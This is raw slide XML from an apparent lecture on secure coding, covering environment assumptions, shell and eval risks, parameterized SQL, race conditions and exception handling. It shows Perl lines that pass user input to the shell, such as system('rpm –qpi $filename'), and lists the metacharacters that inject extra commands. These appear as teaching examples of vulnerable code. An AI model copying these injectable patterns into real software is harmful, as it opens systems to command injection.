            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Signals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>catch them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cookies, data from HTML forms etc.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Coding – common pitfalls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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t make any assumptions about the environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>common way of attacking programs is running them </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>in a different environment than they were designed to run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>e.g.: what PATH did your program get? what @INC? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>set up everything by yourself: current directory, environment variables, umask, signals, open file descriptors etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>think of consequences (example: what if program should be run by normal user, and is run by root? or the opposite?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use features like “taint mode” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>perl –T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>) if available</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69636" name="Picture 4" descr="MCj0351277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3975" y="4879975"/>
            <a:ext cx="1625600" cy="131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637" name="Picture 5" descr="MCj02149180000[1]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7813" y="4895850"/>
            <a:ext cx="1263650" cy="1298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638" name="Picture 6" descr="MCj01045540000[1]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5275" y="4949825"/>
            <a:ext cx="1247775" cy="123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Coding – advice (cont.)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143000"/>
            <a:ext cx="8713788" cy="51435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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Separate data from code: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>
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Careful with shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" i="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" smtClean="0"/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sample line from a Perl script: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system(”rpm –qpi $filename”);</a:t>
            </a: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but what if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> contains illegal characters: | ; ` \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>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>popen()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> also invokes the shell indirectly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same for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open(FILE, ”grep –r $needle |”);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similar:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> eval() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>function (evaluates a string as code) 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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameterized SQL queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> to avoid SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ”select count(*) from users </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	where name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and pwd = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2400" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pg_query_params($connection, $query, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>array($login, $password));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Arrow Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4518025" y="5491163"/>
            <a:ext cx="428625" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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rot="5400000" flipH="1" flipV="1">
            <a:off x="6858794" y="5490369"/>
            <a:ext cx="428625" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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188913"/>
            <a:ext cx="7851775" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Coding – common pitfalls (cont.)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66700" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if someone executes your code twice, or changes environment in the middle of execution of your program?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" lvl="1" indent="-266700" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Race condition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>difference between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>time of check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>time of use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>problem: non-atomic execution of consecutive commands performing an atomic action (“check and do”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>result: invalidation of assumptions made by the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can your code run parallel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use file locking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>beware of deadlocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/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Coding – advice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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deal with errors and exceptions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>catch exceptions (and react)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>check (and use) result codes (e.g.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>close || die</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>don’t assume that everything will work</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(especially file system operations, system and network calls)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>if there is an unexpected error:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Log information to a log file (syslog on Unix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Alert system administrator </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Delete all temporary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Clear (zero) memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Inform user and exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>don’t display internal error messages, stack traces etc. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to the user (he doesn’t need to know the failing SQL query)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Coding – advice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73731" name="Picture 3" descr="error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628775"/>
            <a:ext cx="6311900" cy="382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3732" name="Oval 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="2708275"/>
            <a:ext cx="6119812" cy="1584325"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="317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3733" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7019925" y="4411663"/>
            <a:ext cx="6238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400"/>
              <a:t>OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73734" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6945313" y="3259138"/>
            <a:ext cx="10826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400"/>
              <a:t>Wrong</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73735" name="Oval 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="4149725"/>
            <a:ext cx="6119812" cy="935038"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175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Errors / exceptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74755" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71438" y="1125538"/>
            <a:ext cx="3643312" cy="5183187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0">
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900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sz="1900" i="1" smtClean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...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" smtClean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  // a lot of commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (Exception e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   e.printStackTrace();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean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3857625" y="1116013"/>
            <a:ext cx="5357813" cy="518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66700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Yes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" kern="0" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0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900" i="1" kern="0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// few commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MalformedURLException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0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900" i="1" kern="0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// do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="266700" indent="-266700" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FileNotFoundException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" kern="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
